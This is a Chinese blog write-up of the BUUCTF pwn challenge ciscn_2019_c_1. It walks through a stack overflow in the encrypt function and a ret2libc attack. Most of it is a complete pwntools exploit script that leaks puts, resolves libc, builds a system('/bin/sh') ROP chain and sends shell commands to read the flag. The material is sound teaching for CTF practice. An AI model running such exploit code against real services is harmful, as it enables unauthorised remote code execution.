BUUCTF ciscn_2019_c_1

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量760 收藏 5
点赞数 2
分类专栏: Pwn 文章标签: 学习 python linux 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127600677
版权

1.Checksec & IDA Pro

 64位ELF,开启了部分RELRO以及NX

RELRO 是一种用于加强对 Binary 数据段的保护的技术。RELRO 分为 Partial RELRO 和 Full RELRO

 NX

由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。

 

 

 

主要就需要看这3个函数,encrypt、main、begin

 

2.栈溢出漏洞

存在这个函数中,大小为 

 

80个字符

b'A' * ( 80 + 0x08 )

不止这种方法可以获取大小,还有两种方法。

IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。

常规情况下应该是使用 cyclic -l xxxx 查询。

1. 记事本(然并卵)

把加密后的文本复制到新建文本文档中,查询RBP的前4个字符

84 - 4 即可。

2.gdb 

需要安装 peda 、 gef。

由于安装失败报错,所以没有图片演示。

3.IDA Pro

上面说过了

32位和64位程序在函数调用的方式存在区别。

pwntools入门_TedLau.的博客-CSDN博客_pwntools是什么 

3.构造PoC

Payload思路如下:

( b'A' * ( 80 + 0x08 ) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr) )

思路解析: 

--------------------
b'A' * ( 80 + 0x08 )

需要填充的字符数
80 为 0x50 的10进制
0x08 因为是64位程序
--------------------
p64(pop_rdi)

64位程序中用来传参
--------------------
p64(puts_got)
p64(puts_plt)

用got表中的puts泄露真实地址的后3位,后3位不变。
通过 LibcSearcher 搜索对应的 Libc
即可计算出 LibcBase 也就是puts的真实地址,作为基址。
用来计算 system , /bin/sh 的偏移地址。
--------------------
p64(main_addr)

方便之后进行调用shell函数,让程序返回到main函数。
--------------------

完整PoC

from pwn import * 
from LibcSearcher import LibcSearcher
#from LibcSearcherX import * 
 
elf = ELF("/root/Desktop/PwnSubjects/ciscn_2019_c_1")
#libc = ELF("/root/Desktop/PwnSubjects/libc-2.23 (1).so") 
io = remote("node4.buuoj.cn",25933)
#io = process("/root/Desktop/PwnSubjects/ciscn_2019_c_1")
 
puts_plt = elf.plt['puts'] #获取puts的plt表地址
puts_got = elf.got['puts'] #获取puts的got表地址
rdi_addr = 0x400c83 #用来传递参数的地址
main_addr = elf.symbols['main'] #主函数的地址,用来返回执行第二次
ret=0x4006B9 #栈对齐
 
# 阶段1 泄露真实地址
print("--------------------------------------------------")
print("[+] Leaking real address ...")
print("[+] Phase 1 Inprogress.")
payload_addr = flat( "A" * 0x58 ) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr) #需要输入0x58个a才能溢出栈,大小为0x50+0x08。rdi中存放了puts_got的真实地址,因为是64位程序,puts_plt表调用puts函数打引puts_got值。然后返回到main地址再执行一次程序,方便后续发送用来开启shell的payload
#payload_addr = ( b'A' * ( 80 + 0x08 ) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) +p32(4) )
io.recv()
io.sendline(b"1") #输入1后输入的地方才是需要溢出的地方
io.recvuntil("encrypted\n")
io.sendline(payload_addr)
io.recvuntil("Ciphertext\n")
io.recvuntil("\n")
#io.sendline(payload_addr)
puts_addr = u64(io.recv(6).ljust(8,b'\x00')) # 接收puts的真实地址
#write_addr = u32(io.recv(4))
print("[+] Payload : \n",(payload_addr))
#io.recvuntil('Input:\n')
#io.sendline(payload_addr)
#write_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
 
print("[+] Leacked.")
print(("[+] Real Address : "),hex(puts_addr))
print("[+] Phase 1 Completed.")
print("--------------------------------------------------")
 
# 阶段2 通过泄露的真实地址计算出system以及/bin/sh的地址
print("[+] Phase 2 Inprogress.")
print("[+] Trying got system and /bin/sh address though real address")
#libc = LibcSearcher("write",write_addr)
 
# Dump Dump是给LibcSearcher用的
libc = LibcSearcher("puts",puts_addr) #使用LibcSearcher在绝大部分libc中搜索puts的后3位地址
libcbase = puts_addr - libc.dump('puts') #使用puts的真实地址作为基址
system = libcbase + libc.dump('system') #计算system与/bin/sh偏移值
bin_sh = libcbase + libc.dump('str_bin_sh')
 
# Sym Symbols 是LibcSearcherX的函数调用方式
#libc = LibcSearcherLocal("puts",puts_addr)
#libcbase = puts_addr - libc.sym['puts']
#system = libcbase + libc.sym['system']
#bin_sh = libcbase + libc.sym['str_bin_sh']
 
#libcbase = puts_addr - libc.symbols['puts']
#system = libcbase + libc.symbols['system']
#bin_sh = libcbase + next(libc.search(b'/bin/sh'))
 
print("[+] Phase 2 Completed")
print("--------------------------------------------------")
 
# 阶段3 打印各个地址
print("[+] Phase 3 Inprogress.")
print("[+] Real Address: ",hex(puts_addr))
print("[+] Base Address: ",hex(puts_addr))
print("[+] System Address: ",hex(system))
print("[+] /bin/sh Address: ",hex(bin_sh))
print("[+] Phase 3 Completed")
print("--------------------------------------------------")
 
# 阶段4 获取shell
payload = ( flat( "A" * 0x58) + p64(ret) + p64(rdi_addr) + p64(bin_sh) + p64(system) )
#payload = ( b'A' * ( 136 + 0x04 ) + p32(system) +p32(0) + p32(bin_sh) )
#io.sendlineafter("Input:\n",payload)
io.recv()
io.sendline('1')
io.recvuntil("encrypted\n")
io.sendline(payload)
print("Successfully got shell , Automaticly searching system version.")
print("Got")
io.sendline(b"find '/flag.txt' -exec cat {} \;")
print("The")
io.sendline(b"find '/flag' -exec cat {} \;")
print("Damn")
io.sendline(b"find '/proc/version' -exec cat {} \;")
print("Shell!")
io.interactive()

成功获取shell

 远程调试使用 libc 0 ,本地调试使用 libc 1

Red-Leaves
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 229
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
ciscn_2019_c_1[BUUCTF]
moonlightsunshin的博客
05-03 562
但是程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露出libc基址构造payload来泄露libc。在amd64架构下参数通过rdi传递0x400c83就是我们需要pop_rdi的地址。拿到题先三板斧hecksec --file=ciscn_2019_c_1看保护。开启了NX优先考虑ROP但是关闭了PIE则可能存在缓冲区溢出。查看堆栈窗口得到缓冲区大小 构造0x50+0x8即可溢出。得到 /bin/sh的地址。发现gets函数存在溢出。如果不行就换一个libc。
buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 521
通俗易懂
[BUUCTF]ciscn_2019_c_1
Lucien_Carr的博客
04-08 1293
想办法通过encrypt函数的 get函数栈溢出获得其中一个函数的地址(本题选择puts),通过LibcSearcher得到该函数在对应libc中的偏移量。没有‘system’,‘bin/sh’等有用的字符串,函数列表里也没有system等后门函数。该程序中并没有system,bin/sh等有用的字符串,无法使用ret2text。也没有构造溢出的函数,但是有很多puts,很好后面ret2libc可以用。通过已经调用过的函数泄露它在程序中的地址,然后利用地址末尾的3个字节,在。没什么能构造溢出的函数。
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 584
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
[BUUCTF]ciscn_2019_c_1 1
weixin_55013445的博客
10-01 177
可知,该程序开启了NX(栈不可执行)保护再使用IDA进行反汇编对代码进行分析可知,漏洞点在encrypt()函数的gets()上到此,思路明确,我们可以通过gets()的栈溢出漏洞,获取libc的基地址,接着通过libc的基地址获取system和str_bin_sh的地址,最后执行system(“/bin/sh”)
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 278
BUUCTF 做题练习
ciscn_2019_c_1【BUUCTF
qq_41696518的博客
08-26 1026
ciscn_2019_c_1【BUUCTF
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1628
buuctf ciscn_2019_ne_5题目分析
BUUCTF逆向前八题
01-24
仍然是64位程序,查找"wrong flag",通过Ctrl+x和r键转换ASCII码,根据C语言代码分析,得到flag为"{hack1ng_fo1_fun}"。 4. 内涵的软件: 32位C++程序,通过IDA分析字符串列表,找到相关判断语句,推断出flag所在...
BUUCTF】web之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 893
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
urhero的专栏
07-25 343
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子中,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子中,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
学习日志:JVM垃圾回收
weixin_46117680的博客
07-23 1007
当需要排查各种内存溢出问题、当垃圾收集成为系统达到更高并发的瓶颈时,我们就需要对这些“自动化”的技术实施必要的监控和调节。可达性算法中描述的对象引用,一般指的是强引用,即是GCRoot对象对普通对象有引用关系,只要这层关系存在普通对象就不会被回收。
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络...根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值